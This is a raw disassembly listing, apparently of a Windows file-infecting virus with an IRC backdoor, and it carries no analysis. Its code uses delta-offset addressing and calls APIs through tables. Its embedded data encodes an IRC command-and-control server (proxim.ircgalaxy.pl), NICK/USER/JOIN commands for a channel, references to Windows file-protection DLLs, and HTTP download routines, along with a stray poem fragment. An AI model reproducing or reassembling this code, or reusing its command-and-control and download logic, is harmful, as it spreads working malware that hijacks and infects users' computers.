jz short near ptr loc_3150B6E3+6
loc_3150B6A3: ; CODE XREF: sub_3150B5AF+8F�j
imul ebp, [ebp+41h], 69727474h
loc_3150B6AB: ; CODE XREF: sub_3150B5AF+95�j
bound esi, [ebp+74h]
db 65h
jnb short loc_3150B6F2
add [edi+65h], al
jz short near ptr loc_3150B6FB+1
loc_3150B6B6: ; CODE XREF: sub_3150B5AF+A2�j
imul ebp, [ebp+53h], 657A69h
inc edi
db 65h
jz short loc_3150B708
loc_3150B6C2: ; CODE XREF: sub_3150B5AF+AF�j
imul ebp, [ebp+54h], 656D69h
inc edi
loc_3150B6CB: ; CODE XREF: sub_3150B5AF+C7�j
db 65h
jz short near ptr loc_3150B71A+1
outsd
db 64h
jnz short near ptr loc_3150B739+5
db 65h
dec eax
popa
outsb
db 64h
insb
db 65h
inc ecx
add [edi+65h], al
jz short near ptr loc_3150B72D+6
loc_3150B6DF: ; CODE XREF: sub_3150B5AF+C5�j
db 65h
insd
loc_3150B6E1: ; CODE XREF: sub_3150B5AF+BE�j
jo short near ptr loc_3150B727+2
loc_3150B6E3: ; CODE XREF: sub_3150B5AF+F1�j
imul ebp, [ebp+4Eh], 41656D61h
add [edi+65h], al
jz short near ptr loc_3150B741+3
db 65h
insd
loc_3150B6F2: ; CODE XREF: sub_3150B5AF+FF�j
jo short near ptr loc_3150B741+3
popa
jz short near ptr loc_3150B75E+1
inc ecx
add [edi+65h], al
loc_3150B6FB: ; CODE XREF: sub_3150B5AF+105�j
jz short loc_3150B753
db 65h
jb short near ptr loc_3150B772+1
loc_3150B700: ; CODE XREF: sub_3150B5AF+DB�j
imul ebp, [edi+6Eh], 74654700h
push esi
loc_3150B708: ; CODE XREF: sub_3150B5AF+110�j
db 65h
jb short near ptr loc_3150B77C+2
imul ebp, [edi+6Eh], 417845h
inc edi
db 65h
jz short near ptr loc_3150B76B+1
outsd
insb
jnz short near ptr loc_3150B781+6
loc_3150B71A: ; CODE XREF: sub_3150B5AF:loc_3150B6CB�j
db 65h
dec ecx
outsb
outsw
jb short near ptr loc_3150B78C+2
popa
jz short near ptr loc_3150B78C+1
outsd
outsb
inc ecx
loc_3150B727: ; CODE XREF: sub_3150B5AF:loc_3150B6E1�j
add [edi+ebp*2+61h], cl
db 64h
dec esp
loc_3150B72D: ; CODE XREF: sub_3150B5AF+12E�j
imul esp, [edx+72h], 41797261h
add [ebp+61h], cl
jo short loc_3150B78F
loc_3150B739: ; CODE XREF: sub_3150B5AF+120�j
imul esp, [ebp+77h], 6946664Fh
insb
loc_3150B741: ; CODE XREF: sub_3150B5AF+13F�j
; sub_3150B5AF:loc_3150B6F2�j
add gs:[edi+70h], cl
outs dx, byte ptr gs:[esi]
inc esi
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
loc_3150B753: ; CODE XREF: sub_3150B5AF:loc_3150B6FB�j
add [edi+70h], cl
outs dx, byte ptr gs:[esi]
push eax
jb short near ptr loc_3150B7C9+1
arpl [ebp+73h], sp
loc_3150B75E: ; CODE XREF: sub_3150B5AF+146�j
jnb short $+2
push eax
jb short loc_3150B7D2
arpl [ebp+73h], sp
jnb short near ptr loc_3150B794+7
xor al, [esi+69h]
loc_3150B76B: ; CODE XREF: sub_3150B5AF+164�j
jb short near ptr loc_3150B7DA+6
jz short $+2
push eax
jb short near ptr loc_3150B7DA+7
loc_3150B772: ; CODE XREF: sub_3150B5AF+14E�j
arpl [ebp+73h], sp
jnb short near ptr loc_3150B7A9+1
xor cl, [esi+65h]
js short near ptr loc_3150B7EC+4
loc_3150B77C: ; CODE XREF: sub_3150B5AF:loc_3150B708�j
add [ebx+65h], dl
jz short near ptr loc_3150B7C5+2
loc_3150B781: ; CODE XREF: sub_3150B5AF+169�j
imul ebp, [ebp+41h], 69727474h
bound esi, [ebp+74h]
loc_3150B78C: ; CODE XREF: sub_3150B5AF+173�j
; sub_3150B5AF+170�j
db 65h
jnb short loc_3150B7D0
loc_3150B78F: ; CODE XREF: sub_3150B5AF+188�j
add [ebx+65h], dl
jz short loc_3150B7DA
loc_3150B794: ; CODE XREF: sub_3150B5AF+1B7�j
imul ebp, [ebp+54h], 656D69h
push ebx
insb
db 65h, 65h
jo short $+4
push ebx
jns short loc_3150B818
jz short loc_3150B80C
insd
push esp
loc_3150B7A9: ; CODE XREF: sub_3150B5AF+1C6�j
imul ebp, [ebp+65h], 69466F54h
insb
db 65h
push esp
imul ebp, [ebp+65h], 6D6E5500h
popa
jo short loc_3150B813
imul esp, [ebp+77h], 6946664Fh
insb
loc_3150B7C5: ; CODE XREF: sub_3150B5AF+1D0�j
add gs:[esi+69h], dl
loc_3150B7C9: ; CODE XREF: sub_3150B5AF+1AA�j
jb short near ptr loc_3150B83E+1
jnz short loc_3150B82E
insb
inc ecx
insb
loc_3150B7D0: ; CODE XREF: sub_3150B5AF:loc_3150B78C�j
insb
outsd
loc_3150B7D2: ; CODE XREF: sub_3150B5AF+1B2�j
arpl [eax], ax
push edi
jb short loc_3150B840
jz short loc_3150B83E
inc esi
loc_3150B7DA: ; CODE XREF: sub_3150B5AF+1E3�j
; sub_3150B5AF:loc_3150B76B�j ...
imul ebp, [ebp+0], 6441744Eh
push 75h
jnb short loc_3150B85A
push eax
jb short near ptr loc_3150B84F+3
jbe short near ptr loc_3150B84F+5
insb
loc_3150B7EC: ; CODE XREF: sub_3150B5AF+1CB�j
db 65h, 67h, 65h
jnb near ptr 0B845h
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3150B83B+1
jb short near ptr loc_3150B85F+1
popa
jz short loc_3150B863
inc esi
imul ebp, [ebp+0], 7243744Eh
db 65h
popa
jz short loc_3150B870
push eax
loc_3150B80C: ; CODE XREF: sub_3150B5AF+1F6�j
jb short loc_3150B87D
arpl [ebp+73h], sp
jnb short $+2
loc_3150B813: ; CODE XREF: sub_3150B5AF+20C�j
dec esi
jz short near ptr loc_3150B856+3
jb short loc_3150B87D
loc_3150B818: ; CODE XREF: sub_3150B5AF+1F4�j
popa
jz short loc_3150B880
push eax
jb short loc_3150B88D
arpl [ebp+73h], sp
jnb short near ptr loc_3150B863+5
js short $+2
dec esi
jz short loc_3150B86B
jb short loc_3150B88F
popa
jz short near ptr loc_3150B88F+3
push ebx
loc_3150B82E: ; CODE XREF: sub_3150B5AF+21C�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
inc ebx
jb short near ptr loc_3150B89E+1
popa
loc_3150B83B: ; CODE XREF: sub_3150B5AF+248�j
jz short loc_3150B8A2
push ebp
loc_3150B83E: ; CODE XREF: sub_3150B5AF+228�j
; sub_3150B5AF:loc_3150B7C9�j
jnb short near ptr loc_3150B8A4+1
loc_3150B840: ; CODE XREF: sub_3150B5AF+226�j
jb short near ptr loc_3150B88F+3
jb short loc_3150B8B3
arpl [ebp+73h], sp
jnb short $+2
dec esi
jz short loc_3150B899
popa
jo short near ptr loc_3150B8A4+1
loc_3150B84F: ; CODE XREF: sub_3150B5AF+238�j
; sub_3150B5AF+23A�j
imul esp, [ebp+77h], 6553664Fh
loc_3150B856: ; CODE XREF: sub_3150B5AF+265�j
arpl [ecx+ebp*2+6Fh], si
loc_3150B85A: ; CODE XREF: sub_3150B5AF+235�j
outsb
add [esi+74h], cl
dec edi
loc_3150B85F: ; CODE XREF: sub_3150B5AF+24A�j
jo short loc_3150B8C6
outsb
inc esi
loc_3150B863: ; CODE XREF: sub_3150B5AF+24D�j
; sub_3150B5AF+272�j
imul ebp, [ebp+0], 704F744Eh
loc_3150B86B: ; CODE XREF: sub_3150B5AF+277�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_3150B8DF
loc_3150B870: ; CODE XREF: sub_3150B5AF+25A�j
arpl [ebp+73h], sp
jnb short loc_3150B8C9
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3150B8CB+1
loc_3150B87D: ; CODE XREF: sub_3150B5AF:loc_3150B80C�j
; sub_3150B5AF+267�j
jo short near ptr loc_3150B8E3+1
outsb
loc_3150B880: ; CODE XREF: sub_3150B5AF+26A�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
push eax
jb short near ptr loc_3150B8FB+1
loc_3150B88D: ; CODE XREF: sub_3150B5AF+26D�j
jz short near ptr loc_3150B8F3+1
loc_3150B88F: ; CODE XREF: sub_3150B5AF+279�j
; sub_3150B5AF+27C�j ...
arpl [esi+edx*2+69h], si
jb short loc_3150B909
jnz short near ptr loc_3150B8F7+1
insb
dec ebp
loc_3150B899: ; CODE XREF: sub_3150B5AF+29B�j
db 65h
insd
outsd
jb short near ptr loc_3150B914+3
loc_3150B89E: ; CODE XREF: sub_3150B5AF+289�j
add [esi+74h], cl
push ecx
loc_3150B8A2: ; CODE XREF: sub_3150B5AF:loc_3150B83B�j
jnz short loc_3150B909
loc_3150B8A4: ; CODE XREF: sub_3150B5AF:loc_3150B83E�j
; sub_3150B5AF+29E�j
jb short near ptr loc_3150B91E+1
dec ecx
outsb
outsw
jb short near ptr loc_3150B918+1
popa
jz short loc_3150B918
outsd
outsb
push esp
outsd
loc_3150B8B3: ; CODE XREF: sub_3150B5AF+293�j
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3150B90F+2
jb short loc_3150B925
jz short near ptr loc_3150B922+1
push esi
imul esi, [edx+74h], 4D6C6175h
loc_3150B8C6: ; CODE XREF: sub_3150B5AF:loc_3150B85F�j
db 65h
insd
outsd
loc_3150B8C9: ; CODE XREF: sub_3150B5AF+2C4�j
jb short loc_3150B944
loc_3150B8CB: ; CODE XREF: sub_3150B5AF+2CC�j
add [edx+74h], dl
insb
push ebp
outsb
imul esp, [ebx+6Fh], 74536564h
jb short near ptr loc_3150B941+2
outsb
db 67h
push esp
outsd
inc ecx
loc_3150B8DF: ; CODE XREF: sub_3150B5AF+2BF�j
outsb
jnb short near ptr loc_3150B94A+1
push ebx
loc_3150B8E3: ; CODE XREF: sub_3150B5AF:loc_3150B87D�j
jz short loc_3150B957
imul ebp, [esi+67h], 41535700h
push ebx
jz short loc_3150B950
jb short loc_3150B965
jnz short near ptr loc_3150B962+1
loc_3150B8F3: ; CODE XREF: sub_3150B5AF:loc_3150B88D�j
add [ebx+6Ch], ah
outsd
loc_3150B8F7: ; CODE XREF: sub_3150B5AF+2E6�j
jnb short loc_3150B95E
jnb short near ptr loc_3150B969+1
loc_3150B8FB: ; CODE XREF: sub_3150B5AF+2DC�j
arpl [ebx+65h], bp
jz short $+2
arpl [edi+6Eh], bp
outsb
arpl gs:[eax+eax+67h], si
loc_3150B909: ; CODE XREF: sub_3150B5AF+2E4�j
; sub_3150B5AF:loc_3150B8A2�j
db 65h
jz short near ptr loc_3150B973+1
outsd
jnb short near ptr loc_3150B981+2
loc_3150B90F: ; CODE XREF: sub_3150B5AF+309�j
bound edi, [ecx+6Eh]
popa
insd
loc_3150B914: ; CODE XREF: sub_3150B5AF+2ED�j
add gs:[edx+65h], dh
loc_3150B918: ; CODE XREF: sub_3150B5AF+2FE�j
; sub_3150B5AF+2FB�j
arpl [esi+0], si
jnb short near ptr loc_3150B981+1
outsb
loc_3150B91E: ; CODE XREF: sub_3150B5AF:loc_3150B8A4�j
add fs:[ebx+6Fh], dh
loc_3150B922: ; CODE XREF: sub_3150B5AF+30D�j
arpl [ebx+65h], bp
loc_3150B925: ; CODE XREF: sub_3150B5AF+30B�j
jz short $+2
dec ecx
outsb
jz short loc_3150B990
jb short loc_3150B99B
db 65h
jz short loc_3150B973
insb
outsd
jnb short near ptr loc_3150B998+1
dec eax
popa
outsb
db 64h
insb
add gs:[ecx+6Eh], cl
jz short loc_3150B9A4
jb short near ptr loc_3150B9AE+1
loc_3150B941: ; CODE XREF: sub_3150B5AF+329�j
db 65h
jz short loc_3150B98B
loc_3150B944: ; CODE XREF: sub_3150B5AF:loc_3150B8C9�j
db 65h
jz short loc_3150B98A
outsd
outsb
outsb
loc_3150B94A: ; CODE XREF: sub_3150B5AF+331�j
arpl gs:[ebp+64h], si
push ebx
loc_3150B950: ; CODE XREF: sub_3150B5AF+33E�j
jz short near ptr loc_3150B9B2+1
jz short loc_3150B9B9
add [ecx+6Eh], cl
loc_3150B957: ; CODE XREF: sub_3150B5AF:loc_3150B8E3�j
jz short near ptr loc_3150B9BC+2
jb short loc_3150B9C9
db 65h
jz short near ptr loc_3150B9AB+2
loc_3150B95E: ; CODE XREF: sub_3150B5AF:loc_3150B8F7�j
jo short loc_3150B9C5
outsb
inc ecx
loc_3150B962: ; CODE XREF: sub_3150B5AF+342�j
add [ecx+6Eh], cl
loc_3150B965: ; CODE XREF: sub_3150B5AF+340�j
jz short near ptr loc_3150B9CB+1
jb short loc_3150B9D7
loc_3150B969: ; CODE XREF: sub_3150B5AF+34A�j
db 65h
jz short near ptr loc_3150B9BA+1
jo short loc_3150B9D3
outsb
push ebp
jb short near ptr loc_3150B9DC+2
inc ecx
loc_3150B973: ; CODE XREF: sub_3150B5AF+37E�j
; sub_3150B5AF:loc_3150B909�j
add [ecx+6Eh], cl
jz short near ptr loc_3150B9DC+1
jb short loc_3150B9E8
db 65h
jz short near ptr loc_3150B9CE+1
db 65h
popa
db 64h
inc esi
loc_3150B981: ; CODE XREF: sub_3150B5AF+36C�j
; sub_3150B5AF+35E�j
imul ebp, [ebp+0], 41564441h
push eax
loc_3150B98A: ; CODE XREF: sub_3150B5AF:loc_3150B944�j
dec ecx
loc_3150B98B: ; CODE XREF: sub_3150B5AF:loc_3150B941�j
xor esi, [edx]
db 2Eh
inc esp
dec esp
loc_3150B990: ; CODE XREF: sub_3150B5AF+37A�j
dec esp
add [edx+65h], dl
db 67h
inc ebx
insb
outsd
loc_3150B998: ; CODE XREF: sub_3150B5AF+383�j
jnb short near ptr loc_3150B9FD+2
dec ebx
loc_3150B99B: ; CODE XREF: sub_3150B5AF+37C�j
db 65h
jns short $+3
push edx
db 65h, 67h
dec edi
jo short loc_3150BA09
loc_3150B9A4: ; CODE XREF: sub_3150B5AF+38E�j
outsb
dec ebx
db 65h
jns short near ptr loc_3150B9EC+2
js short loc_3150B9EC
loc_3150B9AB: ; CODE XREF: sub_3150B5AF+3AC�j
add [edx+65h], dl
loc_3150B9AE: ; CODE XREF: sub_3150B5AF+390�j
db 67h
push ecx
jnz short loc_3150BA17
loc_3150B9B2: ; CODE XREF: sub_3150B5AF:loc_3150B950�j
jb short near ptr loc_3150BA2C+1
push esi
popa
insb
jnz short near ptr loc_3150BA1D+1
loc_3150B9B9: ; CODE XREF: sub_3150B5AF+3A3�j
inc ebp
loc_3150B9BA: ; CODE XREF: sub_3150B5AF:loc_3150B969�j
js short loc_3150B9FD
loc_3150B9BC: ; CODE XREF: sub_3150B5AF:loc_3150B957�j
add [edx+65h], dl
db 67h
push ebx
db 65h
jz short loc_3150BA1A
popa
loc_3150B9C5: ; CODE XREF: sub_3150B5AF:loc_3150B95E�j
insb
jnz short near ptr loc_3150BA2C+1
inc ebp
loc_3150B9C9: ; CODE XREF: sub_3150B5AF+3AA�j
js short loc_3150BA0C
loc_3150B9CB: ; CODE XREF: sub_3150B5AF:loc_3150B965�j
add [esi+33h], dl
loc_3150B9CE: ; CODE XREF: sub_3150B5AF+3CB�j
imul byte ptr [edx+2]
push esi
push esi
loc_3150B9D3: ; CODE XREF: sub_3150B5AF+3BD�j
mov edx, esp
push 1
loc_3150B9D7: ; CODE XREF: sub_3150B5AF+3B8�j
push edx
push dword ptr [edx+18h]
push esi
loc_3150B9DC: ; CODE XREF: sub_3150B5AF+3C7�j
; sub_3150B5AF+3C1�j
call dword ptr [ebp+10428Ch]
mov eax, esp
push esi
push esi
push esi
push eax
loc_3150B9E8: ; CODE XREF: sub_3150B5AF+3C9�j
push esi
push dword ptr [eax+18h]
loc_3150B9EC: ; CODE XREF: sub_3150B5AF+3FA�j
; sub_3150B5AF+3F7�j
call dword ptr [ebp+103EFAh]
add esp, 10h
pop esi
retn 8
; END OF FUNCTION CHUNK FOR sub_3150B5AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 49h ; I
db 0FBh ;
db 2Bh ; +
; ---------------------------------------------------------------------------
loc_3150B9FD: ; CODE XREF: sub_3150B5AF:loc_3150B9BA�j
; sub_3150B5AF:loc_3150B998�j
enter 6851h, 0
; ---------------------------------------------------------------------------
db 0
db 0
db 0E8h ;
db 8Dh ;
db 4Ch ; L
db 24h ; $
db 3
db 6Ah ; j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3150B5AF
loc_3150BA09: ; CODE XREF: sub_3150B5AF+3F3�j
add [edx+5], ch
loc_3150BA0C: ; CODE XREF: sub_3150B5AF:loc_3150B9C9�j
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
loc_3150BA17: ; CODE XREF: sub_3150B5AF+401�j
push esp
push 40h
loc_3150BA1A: ; CODE XREF: sub_3150B5AF+412�j
push ecx
push edx
push ebx
loc_3150BA1D: ; CODE XREF: sub_3150B5AF+408�j
call dword ptr [ebp+103F22h]
add esp, 0Ch
call dword ptr [ebp+103F2Ah]
loc_3150BA2C: ; CODE XREF: sub_3150B5AF:loc_3150B9B2�j
; sub_3150B5AF+417�j
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_3150B5AF
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h ;
db 30h ; 0
db 3Eh ; >
db 10h
db 0
db 33h ; 3
db 0C9h ;
db 6Ah ; j
db 0
db 52h ; R
db 68h ; h
db 30h ; 0
db 0
db 32h ; 2
db 0
db 8Bh ;
db 0C4h ;
db 51h ; Q
db 51h ; Q
db 6Ah ; j
db 40h ; @
db 50h ; P
db 51h ; Q
db 6Ah ; j
db 18h
db 83h ;
db 0C0h ;
db 8
db 54h ; T
db 6Ah ; j
db 0Eh
db 50h ; P
db 0FFh
db 95h ;
db 1Eh
db 3Fh ; ?
db 10h
db 0
db 83h ;
db 0C4h ;
db 20h
db 33h ; 3
db 0D2h ;
db 85h ;
db 0C0h ;
db 0Fh
db 99h ;
db 0C2h ;
db 0F7h ;
db 0DAh ;
db 58h ; X
db 23h ; #
db 0C2h ;
db 0C3h ;
db 57h ; W
db 33h ; 3
db 0FFh
db 0E8h ;
db 0C1h ;
db 0FFh
db 0FFh
db 0FFh
db 0Fh
db 84h ;
db 0A5h ;
db 0
db 0
db 0
db 50h ; P
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 8Bh ;
db 0D4h ;
db 6Ah ; j
db 0
db 8Bh ;
db 0CCh ;
db 6Ah ; j
db 40h ; @
db 68h ; h
db 0
db 0
db 10h
db 0
db 6Ah ; j
db 2
db 52h ; R
db 6Ah ; j
db 0
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 6Ah ; j
db 0
db 51h ; Q
db 53h ; S
db 50h ; P
db 0FFh
db 95h ;
db 12h
db 3Fh ; ?
db 10h
db 0
db 5Fh ; _
db 59h ; Y
db 0FFh
db 95h ;
db 62h ; b
db 3Eh ; >
db 10h
db 0
db 85h ;
db 0FFh
db 74h ; t
db 71h ; q
db 8Bh ;
db 8Dh ;
db 90h ;
db 15h
db 10h
db 0
db 0E3h ;
db 0Ch
db 8Dh ;
db 95h ;
db 0
db 10h
db 10h
db 0
db 3
db 0D1h ;
db 57h ; W
db 53h ; S
db 0FFh
db 0D2h ;
db 8Bh ;
db 85h ;
db 0FEh ;
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 16h
db 29h ; )
db 0
db 0
db 0E8h ;
db 2Bh ; +
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 16h
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 63h ; c
db 29h ; )
db 0
db 0
db 0E8h ;
db 1Ah
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 2
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 6Ah ; j
db 29h ; )
db 0
db 0
db 0E8h ;
db 9
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 6
db 3Fh ; ?
db 10h
db 0
db 85h ;
db 0C0h ;
db 74h ; t
db 20h
db 8Dh ;
db 8Fh ;
db 77h ; w
db 29h ; )
db 0
db 0
db 0E8h ;
db 0F4h ;
db 0FEh ;
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 0Eh
db 3Fh ; ?
db 10h
db 0
db 85h ;
db 0C0h ;
db 74h ; t
db 0Bh
db 8Dh ;
db 8Fh ;
db 84h ;
db 29h ; )
db 0
db 0
db 0E8h ;
db 0DFh ;
db 0FEh ;
db 0FFh
db 0FFh
db 8Bh ;
db 0C7h ;
db 5Fh ; _
db 0C3h ;
db 55h ; U
db 0E8h ;
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101B24h
xor ecx, ecx
lea eax, [ebp+101EAFh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B53ED81h, 0FF6A0010h, 1B1E958Dh, 52500010h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B64h, 85C720CDh
dd 101B66h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h
dd 69C3F075h, 103F7C95h, 8840500h, 95894208h, 103F7Ch
dd 55C3E2F7h, 0E8h, 0ED815D00h, 101BADh, 3F809D8Bh, 7C830010h
dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0B695FF00h
dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
dd 0B295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
dd 68016Ah, 52400000h, 3E7E95FFh, 85960010h, 505B74F6h
dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F5Eh
dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EF695FFh
dd 85590010h, 56D075C0h, 3E6295FFh, 578D0010h, 6A575244h
dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
dd 3E8695FFh, 0C4810010h, 208h, 82474FFh, 3F4E95FFh, 0FF530010h
dd 103F4E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10158C8Dh
dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh
dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
dd 6A51CEh, 0FF535651h, 103F4695h, 0C13B5900h, 0DF850Fh
dd 858D0000h, 101EA3h, 0C68006Ah, 50000000h, 4695FF53h
dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h
dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h
dd 103EE6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
dd 64616Fh, 3F5695FFh, 0C0850010h, 0C9333674h, 3F808589h
dd 68510010h, 80000200h, 50565151h, 3F5A95FFh, 958D0010h
dd 101BA7h, 54C93350h, 51525051h, 8E95FF51h, 8700103Eh
dd 95FF2404h, 103E62h, 8D80C3F8h, 10157Fh, 6AC3F901h, 0FF016A01h
dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h
dd 101DCBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F2295h, 968D8B00h
dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
dd 2007473h, 500000h, 70000000h, 69786F72h, 72692E6Dh
dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 6C766864h
dd 61767566h, 4553550Ah, 4A6B2052h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 101EB5h, 157F85C6h, 0FF000010h
dd 103EBA95h, 1FE8C100h, 1E6A3C74h, 3E72B58Bh, 0AC590010h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F76BDh, 2768B00h
dd 0A566A557h, 38EC858Dh, 858F0010h, 103912h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EC695h
dd 74C00B00h, 26A930Dh, 6E95FF53h, 0FF00103Eh, 97E893D0h
dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EC695h
dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h
dd 10432485h, 51515100h, 51515051h, 0C295FF51h, 0E800103Eh
dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EC695h, 0AE800h
dd 73770000h, 6E697270h, 416674h, 6E95FF50h, 8900103Eh
dd 103E7685h, 8D310F00h, 1019858Dh, 7C858900h, 5100103Fh
dd 3EC695FFh, 68930010h, 4, 1992B58Dh, 8D590010h, 103F62BDh
dd 0F5C2E800h, 0C766FFFFh, 101E7585h, 83500000h, 101E77A5h
dd 958D0000h, 101E35h, 16A5450h, 6852006Ah, 80000002h
dd 3F6695FFh, 0C0850010h, 8D22755Ah, 101E688Dh, 66A5200h
dd 1E75B58Dh, 56540010h, 52515050h, 3F6A95FFh, 0FF580010h
dd 103F6295h, 8385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 0C695FF00h, 9300103Eh, 768h, 0E9B58D00h
dd 59001018h, 3F32BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h
dd 2E54454Eh, 4C4C44h, 3EC695FFh, 0C0850010h, 235840Fh
dd 68930000h, 5, 1927B58Dh, 8D590010h, 103F4EBDh, 0F506E800h
dd 0BD83FFFFh, 103F52h, 10840F00h, 81000002h, 190ECh, 1685400h
dd 0FF000001h, 103F3295h, 90C48100h, 50000001h, 6AD48Bh
dd 5295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0E695FF00h
dd 0EB00103Eh, 77BD83E2h, 101Eh, 858D2975h, 101E7Bh, 3E95FF50h
dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
dd 101E77h, 418385C6h, 6A010010h, 6A016A00h, 4A95FF02h
dd 8300103Fh, 840FFFF8h, 160h, 73958D93h, 6A00101Eh, 0FF535210h
dd 103F3A95h, 0FC08500h, 14085h, 94BD8D00h, 0B100101Eh
dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h
dd 103EBEh, 1EA2BD8Dh, 1B10010h, 0FFFA1DE8h, 8F958DFFh
dd 6A00101Eh, 146800h, 53520000h, 3F4695FFh, 448D0010h
dd 958D1424h, 104324h, 0AB60F50h, 1424448Bh, 208E0C1h
dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h
dd 0FF102444h, 0BD8D5032h, 103F84h, 1CE8h, 362E2500h, 202E2078h
dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
dd 95FF5700h, 103E76h, 0ACC481h, 6A0000h, 0FF535750h, 103F4695h
dd 988D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
dd 95FF5700h, 103E76h, 500CC483h, 7680BEBh, 8D000000h
dd 101EA8BDh, 0FF535700h, 103F4695h, 7EC08500h, 84B58D54h
dd 8300103Fh, 101598A5h, 8D8D0000h, 104183h, 6ACE2Bh, 0FF535651h
dd 103F4295h, 0F88300h, 8B912F7Eh, 84B58DFEh, 0B000103Fh
dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 84BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
dd 103F36h, 157FBD80h, 74010010h, 7530682Ah, 95FF0000h
dd 103EE6h, 4183BD80h, 74000010h, 7785C711h, 101Eh, 0C6000000h
dd 10418385h, 8E90000h, 0C7FFFFFEh, 10158885h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h
